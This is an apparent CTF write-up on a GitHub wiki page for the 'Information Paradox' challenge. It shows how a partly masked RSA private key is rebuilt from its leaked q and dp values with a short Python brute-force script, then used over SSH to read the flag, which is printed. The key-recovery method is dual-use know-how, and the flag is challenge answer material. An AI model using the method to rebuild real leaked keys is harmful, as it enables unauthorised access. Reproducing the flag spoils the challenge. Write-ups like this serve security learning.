stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron js-wiki-sidebar-toc-toggle-chevron-open mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Information Paradox</span> </div> </summary> Description Files Solution Recon Execution Flag </details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Invisible Stargate</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Invisible-Stargate/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Off The Grid</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Off-The-Grid/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Strange Traffic</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Strange-Traffic/_toc"> </include-fragment></details> </div></div> </div> <h5 class="mt-0 mb-2">Clone this wiki locally</h5> <div class="width-full input-group"> <input id="wiki-clone-url" type="text" data-autoselect class="form-control input-sm text-small color-fg-muted input-monospace" aria-label="Clone URL for this wiki" value="https://github.com/not1cyyy/CTF-Writeups.wiki.git" readonly> <span> <clipboard-copy for="wiki-clone-url" aria-label="Copy to clipboard" data-view-component="true" class="btn btn-sm zeroclipboard-button"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg style="display: none;" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check color-fg-success"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg></clipboard-copy> </span> </div> </div></div> <div data-view-component="true" class="Layout-main"> <div id="wiki-body" class="gollum-markdown-content"> <div class="markdown-body"> <h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Description</h1>We were supplied with a corrupt RSA private key and we're asked to recover the full key in order to get the flag !<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="┌─[not1cyyy@0x45] - [~/Desktop/space-heroes-CTF/information-paradox_FINISHED] - [dim. avril 17, 01:28]└─[$] <> cat singularity.pem -----BEGIN RSA PRIVATE KEY-----MIIJKgIBAAKCAgEAyiLaBE3WT/Tmu3oKID++lbIhEENZD2+RfHutw5S6odTw10LYuHJLGAs2hjFlg31InNrzWjA8mK11aKTsWtG6OdOU+Nin7vUs918eca2aIzoTjnL8T5ohkzHvzYOn1BRZ6IIeTfgmAN6l3HsiMxH4ADVPpXxoCtJJA18qhCBGv+KcDos7SqL/EGg7USmzxSEGDFE8vFuJYZZEZygC3y4XhDerwtUrWDJbEOKp2VyeXaP2y/jkAm3rG5gpEd4HWIhsCrNl7Zkj9UCj/BX/DgbhEYkSTPKDlZ6ZXIPokD71Fsuol/YbQsLTBTqoo7fqS9PbWBDOMEMgfRjsOYVs2r37A1hsHw8dsz6K1vogs+zOw/Li+jhZ************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************GDYGPNllyOAIOZUCggEBANNvIJO9Roh+p3+E05/Lt4KtR7GxO8oIrslq/j3dZhdpMbW1EomJv45grjC5hdk7e4k2vZKWnQsA0S1hKHwoklNIsbFEfzVBtLazVEnPF1/CDFuCoP1HpZ9gKnPhr0YkaInPyVDax8b41GdHl/D9gUh0xXr8k2UlV10Kt5cN9IrVIrb1CmW0IZyJKEmQRjIpQ/0aCn7Ygw+8SeluVGihwO7BD4GvjqiOeI/uDosELldujATEKZiWtUeBXcBPfIDWNQ0kAB4I1SFR4gkLH0B3bQgmGG/7ZkMeAOoeOh2Rn30sGCbF9KPcxsaX0PROhlc5wgVs7ppcSjp9s6MjPN4qdH0CggEAKGj7TG24BYnr6r9JnqDQPJ1sv4TckYiyHPeN752qw3grLAO0pQQYATe9W/d4yI+0jCZ8m3OXYAbJSkkO9bwHxsFFmpmhXPAo1EmJwSD6x5rIV2z+kUhROLe7qBvCbesDxj47Hb4p2jOP0yHPRS2BcA1gJ18O56ge1xOqVW/IYrHKaG1MN4/FjeailMu7FvAdcAF6nCQD5rIyNI1/A5KO+uRxQwtUA5eahx21XIQm/S31VlMGzM4aeW+huyeAAG8q0uB72hSus9GC0PUK8K/r06EeQ2fYeltYEhRzP7lrHyAUTO4xiopGPFlqXbD/3olItMDI0tfj+X+cKnUg7sTM5QKCAQEAv4GIIEjv+fG+BOJqS/JY5SPOLEQ7w2LZ7dXbMm22ar39KHg5shny****************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************-----END RSA PRIVATE KEY-----">┌─[not1cyyy@0x45] - [~/Desktop/space-heroes-CTF/information-paradox_FINISHED] - [dim. avril 17, 01:28]└─[$] <> cat singularity.pem -----BEGIN RSA PRIVATE KEY-----MIIJKgIBAAKCAgEAyiLaBE3WT/Tmu3oKID++lbIhEENZD2+RfHutw5S6odTw10LYuHJLGAs2hjFlg31InNrzWjA8mK11aKTsWtG6OdOU+Nin7vUs918eca2aIzoTjnL8T5ohkzHvzYOn1BRZ6IIeTfgmAN6l3HsiMxH4ADVPpXxoCtJJA18qhCBGv+KcDos7SqL/EGg7USmzxSEGDFE8vFuJYZZEZygC3y4XhDerwtUrWDJbEOKp2VyeXaP2y/jkAm3rG5gpEd4HWIhsCrNl7Zkj9UCj/BX/DgbhEYkSTPKDlZ6ZXIPokD71Fsuol/YbQsLTBTqoo7fqS9PbWBDOMEMgfRjsOYVs2r37A1hsHw8dsz6K1vogs+zOw/Li+jhZ************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************GDYGPNllyOAIOZUCggEBANNvIJO9Roh+p3+E05/Lt4KtR7GxO8oIrslq/j3dZhdpMbW1EomJv45grjC5hdk7e4k2vZKWnQsA0S1hKHwoklNIsbFEfzVBtLazVEnPF1/CDFuCoP1HpZ9gKnPhr0YkaInPyVDax8b41GdHl/D9gUh0xXr8k2UlV10Kt5cN9IrVIrb1CmW0IZyJKEmQRjIpQ/0aCn7Ygw+8SeluVGihwO7BD4GvjqiOeI/uDosELldujATEKZiWtUeBXcBPfIDWNQ0kAB4I1SFR4gkLH0B3bQgmGG/7ZkMeAOoeOh2Rn30sGCbF9KPcxsaX0PROhlc5wgVs7ppcSjp9s6MjPN4qdH0CggEAKGj7TG24BYnr6r9JnqDQPJ1sv4TckYiyHPeN752qw3grLAO0pQQYATe9W/d4yI+0jCZ8m3OXYAbJSkkO9bwHxsFFmpmhXPAo1EmJwSD6x5rIV2z+kUhROLe7qBvCbesDxj47Hb4p2jOP0yHPRS2BcA1gJ18O56ge1xOqVW/IYrHKaG1MN4/FjeailMu7FvAdcAF6nCQD5rIyNI1/A5KO+uRxQwtUA5eahx21XIQm/S31VlMGzM4aeW+huyeAAG8q0uB72hSus9GC0PUK8K/r06EeQ2fYeltYEhRzP7lrHyAUTO4xiopGPFlqXbD/3olItMDI0tfj+X+cKnUg7sTM5QKCAQEAv4GIIEjv+fG+BOJqS/JY5SPOLEQ7w2LZ7dXbMm22ar39KHg5shny****************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************-----END RSA PRIVATE KEY-----</div><h2><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Files</h2>singularity.pem<h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Solution</h1><h2><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Recon</h2>The key is in the pem format which leads us to think about the asn1 structureThere are 2 intact blocks so we can assume initially that we can recover 2 RSA elements from it<h2><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Execution</h2>Looking at the file I tried to parse it using openssl asn1parse -in singularity.pem which gives me an error<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="┌─[not1cyyy@0x45] - [~/Desktop/space-heroes-CTF/information-paradox_FINISHED] - [dim. avril 17, 01:28]└─[$] <> openssl asn1parse -in singularity.pem Error: offset out of range">┌─[not1cyyy@0x45] - [~/Desktop/space-heroes-CTF/information-paradox_FINISHED] - [dim. avril 17, 01:28]└─[$] <> openssl asn1parse -in singularity.pem Error: offset out of range</div>I went ahead and converted the base64 values into hex values to keep track of the magic bytes of RSA 02 82, doing that and excluding the 2 bytes after it we obtain nothing useful from the first block but instead got 2 integers from the second block !Knowing the asn1 structure we can assume that it can be one of the primes among them, using the isPrime function from Crypto.Util.number library in Python we confirmed that one of them is primeGreat ! Since the other integer isn't prime and is directly after the prime number (q) it's definetly dp (d mod (p-1))Now we need to write a simple python script that will get us p !We know that e*dp = 1 mod (p-1) so doing the math we have to bruteforce p knowing that p = (e*dp-1)/k + 1 for 3<k<eAssuming that e = 65537 we write this python script :<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="from Crypto.Util.number import isPrimeq = 0x00d36f2093bd46887ea77f84d39fcbb782ad47b1b13bca08aec96afe3ddd66176931b5b5128989bf8e60ae30b985d93b7b8936bd92969d0b00d12d61287c28925348b1b1447f3541b4b6b35449cf175fc20c5b82a0fd47a59f602a73e1af46246889cfc950dac7c6f8d4674797f0fd814874c57afc936525575d0ab7970df48ad522b6f50a65b4219c8928499046322943fd1a0a7ed8830fbc49e96e5468a1c0eec10f81af8ea88e788fee0e8b042e576e8c04c4299896b547815dc04f7c80d6350d24001e08d52151e2090b1f40776d0826186ffb66431e00ea1e3a1d919f7d2c1826c5f4a3dcc6c697d0f44e865739c2056cee9a5c4a3a7db3a3233cde2a747dassert isPrime(q)dp = 0x2868fb4c6db80589ebeabf499ea0d03c9d6cbf84dc9188b21cf78def9daac3782b2c03b4a504180137bd5bf778c88fb48c267c9b73976006c94a490ef5bc07c6c1459a99a15cf028d44989c120fac79ac8576cfe91485138b7bba81bc26deb03c63e3b1dbe29da338fd321cf452d81700d60275f0ee7a81ed713aa556fc862b1ca686d4c378fc58de6a294cbbb16f01d70017a9c2403e6b232348d7f03928efae471430b5403979a871db55c8426fd2df5565306ccce1a796fa1bb2780006f2ad2e07bda14aeb3d182d0f50af0afebd3a11e4367d87a5b581214733fb96b1f20144cee318a8a463c596a5db0ffde8948b4c0c8d2d7e3f97f9c2a7520eec4cce5 e = 65537 We were supplied with a corrupt RSA private key and we're asked to recover the full key in order to get the flag ! singularity.pem Looking at the file I tried to parse it using openssl asn1parse -in singularity.pem which gives me an error I went ahead and converted the base64 values into hex values to keep track of the magic bytes of RSA 02 82, doing that and excluding the 2 bytes after it we obtain nothing useful from the first block but instead got 2 integers from the second block ! Knowing the asn1 structure we can assume that it can be one of the primes among them, using the isPrime function from Crypto.Util.number library in Python we confirmed that one of them is prime Great ! Since the other integer isn't prime and is directly after the prime number (q) it's definetly dp (d mod (p-1)) Now we need to write a simple python script that will get us p ! We know that e*dp = 1 mod (p-1) so doing the math we have to bruteforce p knowing that p = (e*dp-1)/k + 1 for 3<k<e Assuming that e = 65537 we write this python script : for kp in range(3, e): p_mul = dp * e - 1 if p_mul % kp == 0: p = (p_mul // kp) + 1 if isPrime(p): breakprint(p)">from Crypto.Util.number import isPrimeq = 0x00d36f2093bd46887ea77f84d39fcbb782ad47b1b13bca08aec96afe3ddd66176931b5b5128989bf8e60ae30b985d93b7b8936bd92969d0b00d12d61287c28925348b1b1447f3541b4b6b35449cf175fc20c5b82a0fd47a59f602a73e1af46246889cfc950dac7c6f8d4674797f0fd814874c57afc936525575d0ab7970df48ad522b6f50a65b4219c8928499046322943fd1a0a7ed8830fbc49e96e5468a1c0eec10f81af8ea88e788fee0e8b042e576e8c04c4299896b547815dc04f7c80d6350d24001e08d52151e2090b1f40776d0826186ffb66431e00ea1e3a1d919f7d2c1826c5f4a3dcc6c697d0f44e865739c2056cee9a5c4a3a7db3a3233cde2a747dassert isPrime(q)dp = 0x2868fb4c6db80589ebeabf499ea0d03c9d6cbf84dc9188b21cf78def9daac3782b2c03b4a504180137bd5bf778c88fb48c267c9b73976006c94a490ef5bc07c6c1459a99a15cf028d44989c120fac79ac8576cfe91485138b7bba81bc26deb03c63e3b1dbe29da338fd321cf452d81700d60275f0ee7a81ed713aa556fc862b1ca686d4c378fc58de6a294cbbb16f01d70017a9c2403e6b232348d7f03928efae471430b5403979a871db55c8426fd2df5565306ccce1a796fa1bb2780006f2ad2e07bda14aeb3d182d0f50af0afebd3a11e4367d87a5b581214733fb96b1f20144cee318a8a463c596a5db0ffde8948b4c0c8d2d7e3f97f9c2a7520eec4cce5 e = 65537 for kp in range(3, e): p_mul = dp * e - 1 if p_mul % kp == 0: p = (p_mul // kp) + 1 if isPrime(p): breakprint(p)</div>The script gives us the needed prime, we proceed to generate the RSA private key using the two primes and connect to the server using ssh with the previously created key.Running the ls command we find a file called flag.txt, we run cat command and voila !<h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Flag</h1>shctf{1nf0rm4ti0n_c4nn0t_b3_d3str0y3d} The script gives us the needed prime, we proceed to generate the RSA private key using the two primes and connect to the server using ssh with the previously created key. Running the ls command we find a file called flag.txt, we run cat command and voila ! shctf{1nf0rm4ti0n_c4nn0t_b3_d3str0y3d} </div> </div></div></div> </div> </div> </div> </turbo-frame> </main> </div> </div> <footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2> <div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div> <nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div> <div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer> <div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div> <div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template> <div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div> <template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check 